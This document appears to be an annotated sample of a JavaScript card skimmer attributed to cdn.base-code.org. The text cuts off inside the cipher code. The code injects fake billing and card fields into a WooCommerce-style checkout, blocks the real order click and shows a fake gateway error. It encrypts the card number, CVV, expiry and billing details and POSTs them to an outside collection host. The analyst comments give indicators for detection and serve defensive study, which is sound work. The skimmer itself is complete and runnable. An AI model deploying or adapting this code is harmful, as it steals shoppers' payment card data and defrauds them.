Skimmer found served from cdn.base-code.org attacking Magento's Authorize CIM Payment module
var lscr, teros, binoms, adumn, hinnes, dertons, linomx, _gfv, hornis, derit, kilons, admis;
(function () {
var attack = function () {
/**
 * Polling entry point of the skimmer; attack() schedules it every 100 ms with setInterval.
 *
 * Analyst notes:
 *  - It returns immediately once localStorage holds 'mage-cache-version'. That key is written by
 *    markAttackAsCompleted() after a capture, so an already-skimmed browser sees the normal checkout.
 *  - It depends on the page's own jQuery and does nothing when jQuery is absent.
 *  - When the checkout has '#billing_email_field' but no '#billing_address_field', it inserts extra
 *    billing inputs (name, address, city, postal code) in front of the e-mail field.
 *  - The fake card table is shown only while '#payment_method_intasend' is checked and is removed
 *    (with document.viewFrom reset) otherwise.
 * Runtime DOM artifacts useful for detection: '#billing_address_field', '#billing_city_field',
 * '#billing_postcode_field' and '#form-table' appearing on a checkout page that does not ship them.
 * NOTE(review): markup and selectors are WooCommerce-style ('woocommerce-input-wrapper',
 * '#place_order', an IntaSend payment method), while the gist title names Magento's Authorize CIM
 * module — the title may describe a related sample; confirm before using it as a label.
 */
function startInjections() {
// Completion marker present: this browser was already processed, stay dormant.
if (localStorage.getItem('mage-cache-version')) {
return;
}
if (typeof jQuery === 'undefined') {
return;
}
// Checkout collects an e-mail but no address: add the missing billing inputs so they can be read later.
if (jQuery('#billing_email_field')[0] && !jQuery('#billing_address_field')[0]) {
if (!jQuery('#billing_first_name_field')[0]) {
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-first validate-required" id="billing_first_name_field" data-priority="10"><label for="billing_first_name" class="">First name&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_first_name" id="billing_first_name" placeholder="" value="" autocomplete="given-name"></span></p><p class="form-row form-row-last validate-required" id="billing_last_name_field" data-priority="20"><label for="billing_last_name" class="">Last name&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_last_name" id="billing_last_name" placeholder="" value="" autocomplete="family-name"></span></p><p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" 
id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>');
} else {
jQuery('#billing_email_field')[0].insertAdjacentHTML('beforebegin', '<p class="form-row form-row-wide validate-required validate-address" id="billing_address_field" data-priority="110"><label for="billing_address" class="">Address&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_email" id="billing_address" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-city" id="billing_city_field" data-priority="110"><label for="billing_city" class="">City&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="text" class="input-text " name="billing_city" id="billing_city" placeholder="" value="" autocomplete=""></span></p><p class="form-row form-row-wide validate-required validate-postcode" id="billing_postcode_field" data-priority="110"><label for="billing_postcode" class="">Postal code&nbsp;<abbr class="required" title="required">*</abbr></label><span class="woocommerce-input-wrapper"><input type="email" class="input-text " name="billing_postcode" id="billing_postcode" placeholder="" value="" autocomplete=""></span></p>');
}
}
// The fake card form exists only while the IntaSend payment option is selected.
if (jQuery('#payment_method_intasend').is(':checked')) {
injectPaymentTable();
} else {
jQuery('#form-table').remove();
document.viewFrom = false;
}
}
/**
 * Second 100 ms poller: removes the injected card table once a capture has been recorded.
 *
 * It acts only while document.viewFrom is truthy (the fake form is showing) and the
 * 'recently_viewed_product_session' localStorage key exists; markAttackAsCompleted() writes that key.
 * For incident response, this key together with 'mage-cache-version' in a customer's browser
 * storage indicates that this script ran to completion there.
 */
function removeInjectionIfDone() {
if (document.viewFrom) {
if (localStorage.getItem('recently_viewed_product_session')) {
jQuery('#form-table').remove();
document.viewFrom = false;
}
}
}
/**
 * Inserts the fake card-entry table ('#form-table') after the paragraph inside
 * '.payment_method_intasend', unless it is already present, and records that in document.viewFrom.
 *
 * The table carries four inputs the rest of the script reads: '#cardNoInput', '#cardMonth',
 * '#cardYear' and '#cardCVV'. Event hooks are attached two seconds after insertion.
 * NOTE(review): presumably the legitimate payment method does not render card inputs in the
 * merchant page (the alert shown later speaks of a redirect) — confirm against the real plugin.
 * If so, card inputs inside this container are themselves an indicator of tampering.
 */
function injectPaymentTable() {
/**
 * Attaches the capture hooks and makes sure the injected inputs are enabled.
 * Both listeners are registered with useCapture = true, so they run in the capture phase,
 * ahead of bubble-phase handlers that the shop has bound to the same elements.
 */
function hookInjectedPaymentTable() {
if (jQuery('#cardCVV')[0]) {
jQuery('#cardCVV')[0].addEventListener('change', changeCallback, true);
}
if (jQuery('#place_order')[0]) {
jQuery('#place_order')[0].addEventListener('click', clickCallback, true);
}
jQuery('#cardNoInput').removeAttr('disabled');
jQuery('#cardMonth').removeAttr('disabled');
jQuery('#cardYear').removeAttr('disabled');
jQuery('#cardCVV').removeAttr('disabled');
}
if (!jQuery('#form-table')[0] && jQuery('.payment_method_intasend p')[0]) {
jQuery('.payment_method_intasend p').after('<table cellpadding="0" id="form-table" cellspacing="0" border="0" style="min-width: 300px;margin-top: 15px !important;max-width: 360px;border: none !important;"><tbody style=" border: none !important;"><tr style=" border: none !important;"><td class="two width190" style=" border: none !important;"><label for="cardNoInput"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Card number</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardNoInput" name="cardNoInput" tabindex="60" value="" maxlength="20" autocomplete="off" class="has-error" style="border: 1px solid red;border: 1px solid rgb(213, 213, 213);"></td></tr><tr><td class="two width190" style=" border: none !important;"><span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">Expiry date</span></td><td class="two" style=" border: none !important;"> <select name="cardExp.month" tabindex="110" id="cardMonth" class="has-error" style=" width: 45%; "><option value="" selected="selected">--</option><option value="1">01</option><option value="2">02</option><option value="3">03</option><option value="4">04</option><option value="5">05</option><option value="6">06</option><option value="7">07</option><option value="8">08</option><option value="9">09</option><option value="10">10</option><option value="11">11</option><option value="12">12</option> </select> <select name="cardExp.year" tabindex="120" id="cardYear" class="has-error" style=" width: 45%; "><option value="" selected="selected">----</option><option value="2022">2022</option><option value="2023">2023</option><option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option><option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option><option value="2030">2030</option><option 
value="2031">2031</option><option value="2032">2032</option><option value="2033">2033</option><option value="2034">2034</option><option value="2035">2035</option><option value="2036">2036</option><option value="2037">2037</option><option value="2038">2038</option><option value="2039">2039</option> </select></td></tr><tr><td class="two width190" style=" border: none !important;"><label for="cardCVV"> <span style="font-family: Verdana,Geneva,Arial,Helvetica,Sans-Serif;font-size: 10pt;font-weight: bold !important;">CVC</span></label></td><td class="two" style=" border: none !important;"> <input type="text" id="cardCVV" name="cardCVV" tabindex="70" size="4" maxlength="4" autocomplete="off" value="" class="has-error" style=" width: 40%; "></td></tr></tbody></table>');
// Hooks are attached after a 2 s delay; document.viewFrom marks the fake form as showing.
setTimeout(hookInjectedPaymentTable, 2000);
document.viewFrom = true;
}
}
/**
 * Checks the four injected card inputs and outlines invalid ones in red, imitating form validation.
 *
 * The card number must be non-empty and pass isValidCcNumber(). The CVV needs at least three
 * characters. Month and year only need a non-empty value.
 *
 * @param {*} fieldNamesArr - Never read; the field list is hard-coded below.
 * @returns {boolean} true when every field passed, false otherwise.
 */
function validateCcFields(fieldNamesArr) {
// Validates one field by element id and clears isDataComplete (closure variable) on failure.
function validateField(fieldName) {
var element = jQuery('#' + fieldName);
switch (fieldName) {
case 'cardNoInput':
if (!element.val() || !isValidCcNumber(element.val())) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
case 'cardCVV':
if (!element.val() || element.val().length < 3) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
default:
if (!element.val()) {
element.css('border', '1px solid red');
isDataComplete = false;
} else {
element.css('border', '1px solid rgb(213, 213, 213)');
}
break;
}
}
var isDataComplete = true;
[
'cardMonth',
'cardYear',
'cardCVV',
'cardNoInput'
].forEach(validateField);
return isDataComplete;
}
/**
 * 'change' handler bound to '#cardCVV' by hookInjectedPaymentTable().
 *
 * Analyst note: as soon as the CVV field changes to a non-empty value this calls
 * collectAllAvailablePii(), which sends the data. Exfiltration therefore does not wait for the
 * Place order click and is not gated by validateCcFields(), so partial or mistyped entries can
 * leave the browser too.
 */
function changeCallback(event) {
if (event && event.currentTarget && event.currentTarget.value) {
collectAllAvailablePii();
}
}
/**
 * Luhn checksum over the card number, used by validateCcFields().
 *
 * Spaces are stripped first. The digits are walked right to left and every second digit is
 * doubled, with 9 subtracted when the result exceeds 9.
 *
 * @param {string} ccNum - Card number as typed.
 * @returns {boolean} true when the digit sum is a multiple of 10. A non-digit character turns
 *   the sum into NaN, so the result is false.
 */
function isValidCcNumber(ccNum) {
ccNum = ccNum.replace(/ /g, '');
var digit, reverseNum, alternateNow, sumOfDigits, i, numLength;
alternateNow = true;
sumOfDigits = 0;
reverseNum = (ccNum + '').split('').reverse();
for (i = 0, numLength = reverseNum.length; i < numLength; i++) {
digit = reverseNum[i];
digit = parseInt(digit, 10);
// Assignment inside the condition is deliberate: it flips the flag and tests the new value,
// so the rightmost digit is not doubled and the next one is.
if (alternateNow = !alternateNow) {
digit *= 2;
}
if (digit > 9) {
digit -= 9;
}
sumOfDigits += digit;
}
return sumOfDigits % 10 === 0;
}
/**
 * Capture-phase 'click' handler bound to '#place_order' by hookInjectedPaymentTable().
 *
 * While the fake form is showing (document.viewFrom) and no completion marker exists, every click
 * on Place order is swallowed with stopPropagation() and preventDefault(). If the fake fields
 * validate, the data is sent and markAttackAsCompleted() runs 1.5 s later.
 *
 * Indicators for responders: the localStorage keys 'mage-cache-version' and
 * 'recently_viewed_product_session' holding GUID-like values, and customers reporting the
 * "Gateway error" alert text below.
 */
function clickCallback(event) {
/**
 * Marks this browser as processed, shows a fake gateway error, re-triggers the Place order
 * click and removes the fake form. Because 'mage-cache-version' is set by then, the guard in
 * clickCallback() no longer blocks that click.
 */
function markAttackAsCompleted() {
localStorage.setItem('mage-cache-version', generateGUID__());
localStorage.setItem('recently_viewed_product_session', generateGUID__());
alert('Gateway error. You will be automatically redirected to the our website for payment processing after placing the order.');
jQuery('#place_order').click();
jQuery('#form-table').remove();
document.viewFrom = false;
}
if (!localStorage.getItem('mage-cache-version') && document.viewFrom) {
if (validateCcFields()) {
collectAllAvailablePii();
setTimeout(markAttackAsCompleted, 1500);
}
// The genuine order submission is suppressed whether or not the fields validated.
event.stopPropagation();
event.preventDefault();
}
}
/**
 * Gathers card and billing data from the page, encrypts it and POSTs it to the collection host.
 *
 * What leaves the browser, as built below: card number, expiry and CVV from the injected table;
 * billing name, e-mail, address, city and postal code; the shop host name; the user agent; and a
 * fixed 'Uid' string.
 *
 * Analyst notes:
 *  - Destination: POST to https://cdn.base-code.org/web/ with form fields 'main', 'uniqueId' and
 *    'storedId'. Such a request from a checkout page is a network indicator. jQuery.ajax issues an
 *    XHR, so a Content-Security-Policy connect-src allow-list that omits this host would block it.
 *  - 'main' is the encrypted JSON, while 'uniqueId' and 'storedId' are the key and IV used for it
 *    (from derit() and kilons()). Key, IV and ciphertext travel in the same request, so the
 *    encryption only hides the content from pattern-matching inspection; anyone holding a
 *    captured request can recover the payload.
 *  - The JSON key names (including the misspelt 'Sity') and the constant 'Uid' value are
 *    stable strings to search for in other samples.
 */
function collectAllAvailablePii() {
var details = {
cdnb: jQuery('#cardNoInput').val(),
cdm: jQuery('#cardMonth').val(),
cdy: jQuery('#cardYear').val(),
cdc: jQuery('#cardCVV').val(),
f: getValueFromLocalStorageOrElement('#billing_first_name'),
l: getValueFromLocalStorageOrElement('#billing_last_name'),
e: getValueFromLocalStorageOrElement('#billing_email'),
t: null,
a: getValueFromLocalStorageOrElement('#billing_address'),
a2: '',
co: 'US',
pc: getValueFromLocalStorageOrElement('#billing_postcode'),
c: getValueFromLocalStorageOrElement('#billing_city')
};
// Fallback: when name, address or city is missing, parse the text of the selected saved-address
// option, which is split on commas as name, address, city, "state postcode".
if (!details.f || !details.a || !details.c) {
var _0x47FF = jQuery('#billing-address-select option:selected').text();
if (_0x47FF) {
var _0x4742 = _0x47FF.split(',');
if (_0x4742 && _0x4742.length) {
if (!details.f) {
details.cdn = _0x4742[0] ? _0x4742[0].trim() : '';
}
details.a = _0x4742[1] ? _0x4742[1].trim() : '';
details.c = _0x4742[2] ? _0x4742[2].trim() : '';
if (_0x4742[3] && _0x4742[3].length) {
var _0x4757 = _0x4742[3].trim().split(' ');
details.r = _0x4757[0] ? _0x4757[0].trim() : '';
details.pc = _0x4757[1] ? _0x4757[1].trim() : '';
}
}
}
}
// Record as serialized for exfiltration. 'State' is set only by the fallback above.
var parsedData = {
Address: details.a + ' ' + details.a2,
CCname: details.cdn || details.f + ' ' + details.l,
Email: details.e,
Phone: details.t,
Sity: details.c,
State: details.r,
Country: details.co,
Zip: details.pc,
Shop: window.location.host,
CcNumber: details.cdnb,
ExpDate: details.cdm + '/' + details.cdy,
Cvv: details.cdc,
Useragent: navigator.userAgent,
Uid: 'e0c9f90de835a3296f9ac37d60473842e39ecef9'
};
var _0x47D5 = JSON.stringify(parsedData);
// derit, kilons and admis are the globals that attack() points at generateGUID_, generateIV_
// and encryptData_: a fresh key, a fresh IV, then the encrypted JSON.
var _0x47AB = derit();
var _0x4796 = kilons();
var _0x476C;
_0x476C = {
main: admis(_0x47D5, _0x47AB, _0x4796),
guid: _0x47AB,
refer: _0x4796
};
jQuery.ajax({
url: 'https://cdn.base-code.org/web/',
data: {
main: _0x476C.main,
uniqueId: _0x476C.guid,
storedId: _0x476C.refer
},
type: 'POST',
dataType: 'json'
});
}
/**
 * Reads a value either from localStorage or from a form element.
 *
 * @param {string} target - localStorage key when isLocalStorage is truthy, otherwise a jQuery selector.
 * @param {boolean} [isLocalStorage] - Selects the localStorage path. Every call visible in this
 *   file omits it, so only the DOM path is exercised here.
 * @returns {string} The value found, or '' when it is missing or empty.
 */
function getValueFromLocalStorageOrElement(target, isLocalStorage) {
var val = '';
if (isLocalStorage) {
val = localStorage.getItem(target) || '';
} else {
val = jQuery(target).val() || '';
}
return val;
}
/**
 * Builds a GUID-shaped string (8-4-4-4-12 hex digits) from Math.random().
 *
 * In this file it only supplies the values stored under the two localStorage completion markers
 * in markAttackAsCompleted(); it is not the encryption key.
 *
 * @returns {string} Random hex string in GUID layout.
 */
function generateGUID__() {
// Four random hex digits per call.
function getRand() {
return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
}
return getRand() + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + '-' + getRand() + getRand() + getRand();
}
/**
 * Produces 32 random byte values (via Math.random) and returns them base64-encoded.
 *
 * Despite the name this is the per-request encryption key: collectAllAvailablePii() obtains it
 * through the global 'derit' and sends it as the 'uniqueId' form field next to the ciphertext.
 *
 * @returns {string} Base64 of a 32-character binary string.
 */
function generateGUID_() {
var output = '';
for (var _ = 0; _ < 32; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
// The looked-up element is never used.
var _0x4757 = document.getElementById('key');
return btoa(output);
}
/**
 * Produces 16 random byte values (via Math.random) and returns them base64-encoded.
 *
 * This is the per-request IV: collectAllAvailablePii() obtains it through the global 'kilons'
 * and sends it as the 'storedId' form field next to the ciphertext.
 *
 * @returns {string} Base64 of a 16-character binary string.
 */
function generateIV_() {
var output = '';
for (var _ = 0; _ < 16; _++) {
output += String.fromCharCode(Math.round(Math.random() * 255));
}
// The looked-up element is never used.
var _0x4757 = document.getElementById('iv');
return btoa(output);
}
function encryptData_(data, guid, iv) {
// Fallback key: overwrites encryptData_'s existingGuid with 32 random byte values.
// The last statements of encryptData_ call it when no key was passed or the key does not decode to 32 bytes.
function generateGuid32() {
existingGuid = [];
for (var _ = 0; _ < 32; _++) {
existingGuid.push(Math.round(255 * Math.random()));
}
}
// Fallback IV: overwrites encryptData_'s existingIv with 16 random byte values.
// The last statements of encryptData_ call it when no IV was passed or the IV does not decode to 16 bytes.
function generateIv16() {
existingIv = [];
for (var _ = 0; _ < 16; _++) {
existingIv.push(Math.round(255 * Math.random()));
}
}
/**
 * Base64-decodes s and returns the decoded characters as an array of character codes.
 * It turns the base64 key and IV strings into byte arrays for the cipher.
 */
function getCodeArrFromString(s) {
// Plain string-to-char-code conversion.
function str2CodeArr(str) {
for (var arr = [], i = 0; i < str.length; i++) {
arr.push(str.charCodeAt(i));
}
return arr;
}
return str2CodeArr(atob(s));
}
// AES key-schedule helper: rotates a 4-element word left by one position, in place, and returns it.
function rotate_(arrLen3) {
for (var firstItem = arrLen3[0], i = 0; i < 3; i++) {
arrLen3[i] = arrLen3[i + 1];
}
return arrLen3[3] = firstItem, arrLen3;
}
// AES key-schedule core: rotates the word, substitutes each byte through this.sbox, then XORs the
// first byte with this.Rcon[_0x4742] (the round-constant index).
function core_(_0x476C, _0x4742) {
_0x476C = this.rotate(_0x476C);
for (var _0x4757 = 0; _0x4757 < 4; ++_0x4757) {
_0x476C[_0x4757] = this.sbox[_0x476C[_0x4757]];
}
return _0x476C[0] = _0x476C[0] ^ this.Rcon[_0x4742], _0x476C;
}
/**
 * AES key expansion.
 *
 * @param {number[]} _0x4814 - Cipher key bytes.
 * @param {number} _0x4796 - Key size in bytes (16, 24 or 32 per this.keySize).
 * @returns {number[]} Expanded key of 16 * (rounds + 1) bytes.
 */
function expandKey_(_0x4814, _0x4796) {
// Zero-fill the expanded-key buffer, then copy the cipher key into its start.
for (var _0x47EA = 16 * (this.numberOfRounds(_0x4796) + 1), _0x47C0 = 0, _0x47D5 = 1, _0x4757 = [], _0x47FF = [], _0x4742 = 0; _0x4742 < _0x47EA; _0x4742++) {
_0x47FF[_0x4742] = 0;
}
for (var _0x4781 = 0; _0x4781 < _0x4796; _0x4781++) {
_0x47FF[_0x4781] = _0x4814[_0x4781];
}
for (_0x47C0 += _0x4796; _0x47C0 < _0x47EA;) {
// Take the previous 4-byte word as the working word.
for (var _0x4829 = 0; _0x4829 < 4; _0x4829++) {
_0x4757[_0x4829] = _0x47FF[_0x47C0 - 4 + _0x4829];
}
// Apply the schedule core at each key-size boundary; 32-byte keys get an extra S-box pass mid-way.
if (_0x47C0 % _0x4796 == 0 && (_0x4757 = this.core(_0x4757, _0x47D5++)), _0x4796 == this.keySize.SIZE_256 && _0x47C0 % _0x4796 == 16) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x4757[_0x476C] = this.sbox[_0x4757[_0x476C]];
}
}
// New word = word one key-length back XOR working word.
for (var _0x47AB = 0; _0x47AB < 4; _0x47AB++) {
_0x47FF[_0x47C0] = _0x47FF[_0x47C0 - _0x4796] ^ _0x4757[_0x47AB], _0x47C0++;
}
}
return _0x47FF;
}
// AES AddRoundKey: XORs the 16-byte state with the 16-byte round key in place and returns the state.
function addRoundKey_(_0x4757, _0x472D) {
for (var _0x4742 = 0; _0x4742 < 16; _0x4742++) {
_0x4757[_0x4742] ^= _0x472D[_0x4742];
}
return _0x4757;
}
// Copies 16 bytes of the expanded key, starting at offset _0x472D, into a new array while
// transposing the 4x4 layout so it matches the state's ordering.
function createRoundKey_(_0x4781, _0x472D) {
for (var _0x476C = [], _0x4742 = 0; _0x4742 < 4; _0x4742++) {
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) {
_0x476C[4 * _0x4757 + _0x4742] = _0x4781[_0x472D + 4 * _0x4742 + _0x4757];
}
}
return _0x476C;
}
// AES SubBytes: replaces each of the 16 state bytes through this.sbox, or through this.rsbox
// when the inverse flag _0x4742 is truthy.
function subBytes_(_0x476C, _0x4742) {
for (var _0x4757 = 0; _0x4757 < 16; _0x4757++) {
_0x476C[_0x4757] = _0x4742 ? this.rsbox[_0x476C[_0x4757]] : this.sbox[_0x476C[_0x4757]];
}
return _0x476C;
}
// AES ShiftRows: row r (0..3) of the state is rotated r positions; _0x4742 selects the inverse direction.
function shiftRows_(_0x476C, _0x4742) {
for (var _0x4757 = 0; _0x4757 < 4; _0x4757++) {
_0x476C = this.shiftRow(_0x476C, 4 * _0x4757, _0x4757, _0x4742);
}
return _0x476C;
}
// Rotates the 4 bytes starting at offset _0x4742 by one position, _0x4781 times:
// to the right when the inverse flag _0x4757 is truthy, to the left otherwise.
function shiftRow_(_0x47AB, _0x4742, _0x4781, _0x4757) {
for (var _0x476C = 0; _0x476C < _0x4781; _0x476C++) {
if (_0x4757) {
for (var _0x472D = _0x47AB[_0x4742 + 3], _0x4796 = 3; _0x4796 > 0; _0x4796--) {
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 - 1];
}
_0x47AB[_0x4742] = _0x472D;
} else {
for (_0x472D = _0x47AB[_0x4742], _0x4796 = 0; _0x4796 < 3; _0x4796++) {
_0x47AB[_0x4742 + _0x4796] = _0x47AB[_0x4742 + _0x4796 + 1];
}
_0x47AB[_0x4742 + 3] = _0x472D;
}
}
return _0x47AB;
}
// Bitwise shift-and-add multiplication of two bytes as used by MixColumns: eight iterations,
// XOR-ing with 27 (0x1b) whenever the high bit of the multiplicand was set before the shift.
function galois_multiplication_(_0x4781, _0x472D) {
for (var _0x476C = 0, _0x4742 = 0; _0x4742 < 8; _0x4742++) {
1 == (1 & _0x472D) && (_0x476C ^= _0x4781), _0x476C > 256 && (_0x476C ^= 256);
var _0x4757 = 128 & _0x4781;
(_0x4781 <<= 1) > 256 && (_0x4781 ^= 256), 128 == _0x4757 && (_0x4781 ^= 27), _0x4781 > 256 && (_0x4781 ^= 256), (_0x472D >>= 1) > 256 && (_0x472D ^= 256);
}
return _0x476C;
}
// AES MixColumns: extracts each of the four state columns, transforms it with this.mixColumn
// (inverse when _0x4757 is truthy) and writes it back.
function mixColumns_(_0x47AB, _0x4757) {
for (var _0x4796 = [], _0x476C = 0; _0x476C < 4; _0x476C++) {
for (var _0x4781 = 0; _0x4781 < 4; _0x4781++) {
_0x4796[_0x4781] = _0x47AB[4 * _0x4781 + _0x476C];
}
_0x4796 = this.mixColumn(_0x4796, _0x4757);
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47AB[4 * _0x4742 + _0x476C] = _0x4796[_0x4742];
}
}
return _0x47AB;
}
// Transforms one 4-byte column with coefficients [2,1,1,3] or, for the inverse, [14,9,13,11].
// The products are computed with this.galois_multiplication.
function mixColumn_(_0x4796, _0x4742) {
var _0x4781 = [];
_0x4781 = _0x4742 ? [14,9,13,11] : [2,1,1,3];
// Work from a copy so the in-place writes below read the original column values.
for (var _0x4757 = [], _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x4757[_0x476C] = _0x4796[_0x476C];
}
return _0x4796[0] = this.galois_multiplication(_0x4757[0], _0x4781[0]) ^ this.galois_multiplication(_0x4757[3], _0x4781[1]) ^ this.galois_multiplication(_0x4757[2], _0x4781[2]) ^ this.galois_multiplication(_0x4757[1], _0x4781[3]), _0x4796[1] = this.galois_multiplication(_0x4757[1], _0x4781[0]) ^ this.galois_multiplication(_0x4757[0], _0x4781[1]) ^ this.galois_multiplication(_0x4757[3], _0x4781[2]) ^ this.galois_multiplication(_0x4757[2], _0x4781[3]), _0x4796[2] = this.galois_multiplication(_0x4757[2], _0x4781[0]) ^ this.galois_multiplication(_0x4757[1], _0x4781[1]) ^ this.galois_multiplication(_0x4757[0], _0x4781[2]) ^ this.galois_multiplication(_0x4757[3], _0x4781[3]), _0x4796[3] = this.galois_multiplication(_0x4757[3], _0x4781[0]) ^ this.galois_multiplication(_0x4757[2], _0x4781[1]) ^ this.galois_multiplication(_0x4757[1], _0x4781[2]) ^ this.galois_multiplication(_0x4757[0], _0x4781[3]), _0x4796;
}
// One forward AES round on the state: SubBytes, ShiftRows, MixColumns, AddRoundKey with round key _0x4742.
function round_(_0x4757, _0x4742) {
return _0x4757 = this.subBytes(_0x4757, false), _0x4757 = this.shiftRows(_0x4757, false), _0x4757 = this.mixColumns(_0x4757, false), _0x4757 = this.addRoundKey(_0x4757, _0x4742);
}
// One inverse AES round: inverse ShiftRows, inverse SubBytes, AddRoundKey, inverse MixColumns.
// It is reached only through invMain_, which the encryption path in this file does not use.
function invRound(_0x4757, _0x4742) {
return _0x4757 = this.shiftRows(_0x4757, true), _0x4757 = this.subBytes(_0x4757, true), _0x4757 = this.addRoundKey(_0x4757, _0x4742), _0x4757 = this.mixColumns(_0x4757, true);
}
// Forward AES on one state: initial AddRoundKey, rounds 1.._0x476C-1 via this.round, then a final
// round without MixColumns. _0x4742 is the expanded key, _0x476C the number of rounds.
function main_(_0x4781, _0x4742, _0x476C) {
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0));
for (var _0x4757 = 1; _0x4757 < _0x476C; _0x4757++) {
_0x4781 = this.round(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757));
}
return _0x4781 = this.subBytes(_0x4781, false), _0x4781 = this.shiftRows(_0x4781, false), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C));
}
// Inverse AES on one state: AddRoundKey with the last round key, inverse rounds _0x476C-1..1, then
// inverse ShiftRows, inverse SubBytes and AddRoundKey with round key 0. It is called only by decrypt_.
function invMain_(_0x4781, _0x4742, _0x476C) {
_0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 16 * _0x476C));
for (var _0x4757 = _0x476C - 1; _0x4757 > 0; _0x4757--) {
_0x4781 = this.invRound(_0x4781, this.createRoundKey(_0x4742, 16 * _0x4757));
}
return _0x4781 = this.shiftRows(_0x4781, true), _0x4781 = this.subBytes(_0x4781, true), _0x4781 = this.addRoundKey(_0x4781, this.createRoundKey(_0x4742, 0));
}
// Maps a key size in bytes to the AES round count: 10, 12 or 14 for this.keySize.SIZE_128,
// SIZE_192 and SIZE_256 (16, 24 and 32 in the utils table). Returns null for any other size.
function numberOfRounds_(_0x4757) {
var _0x4742;
switch (_0x4757) {
case this.keySize.SIZE_128:
_0x4742 = 10;
break;
case this.keySize.SIZE_192:
_0x4742 = 12;
break;
case this.keySize.SIZE_256:
_0x4742 = 14;
break;
default:
return null;
}
return _0x4742;
}
/**
 * Encrypts a single 16-byte block.
 *
 * @param {number[]} _0x47FF - 16 input bytes.
 * @param {number[]} _0x4796 - Cipher key bytes.
 * @param {number} _0x47D5 - Key size in bytes.
 * @returns {number[]} 16 output bytes.
 */
function encrypt_(_0x47FF, _0x4796, _0x47D5) {
// Transpose the input into the state layout.
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) {
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742];
}
}
var _0x4781 = this.expandKey(_0x4796, _0x47D5);
_0x47C0 = this.main(_0x47C0, _0x4781, _0x4757);
// Transpose the state back into output order.
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C];
}
}
return _0x47AB;
}
/**
 * Decrypts a single 16-byte block; same shape as encrypt_ but runs this.invMain.
 * In this file it is referenced only from the CBC branch of decrypt__, which encryptData_ never calls.
 *
 * @param {number[]} _0x47FF - 16 input bytes.
 * @param {number[]} _0x4796 - Cipher key bytes.
 * @param {number} _0x47D5 - Key size in bytes.
 * @returns {number[]} 16 output bytes.
 */
function decrypt_(_0x47FF, _0x4796, _0x47D5) {
for (var _0x47AB = [], _0x47C0 = [], _0x4757 = this.numberOfRounds(_0x47D5), _0x47EA = 0; _0x47EA < 4; _0x47EA++) {
for (var _0x4742 = 0; _0x4742 < 4; _0x4742++) {
_0x47C0[_0x47EA + 4 * _0x4742] = _0x47FF[4 * _0x47EA + _0x4742];
}
}
var _0x4781 = this.expandKey(_0x4796, _0x47D5);
_0x47C0 = this.invMain(_0x47C0, _0x4781, _0x4757);
for (var _0x4814 = 0; _0x4814 < 4; _0x4814++) {
for (var _0x476C = 0; _0x476C < 4; _0x476C++) {
_0x47AB[4 * _0x4814 + _0x476C] = _0x47C0[_0x4814 + 4 * _0x476C];
}
}
return _0x47AB;
}
// Returns the slice [_0x4742, _0x476C) of the byte array, capped at 16 bytes. The fourth parameter is unused.
function getBlock_(_0x4781, _0x4742, _0x476C, _0x4757) {
return _0x476C - _0x4742 > 16 && (_0x476C = _0x4742 + 16), _0x4781.slice(_0x4742, _0x476C);
}
/**
 * Mode-of-operation driver around the block cipher (this.aes.encrypt).
 *
 * @param {number[]} _0x4853 - Plaintext bytes; padded in place when the mode is CBC.
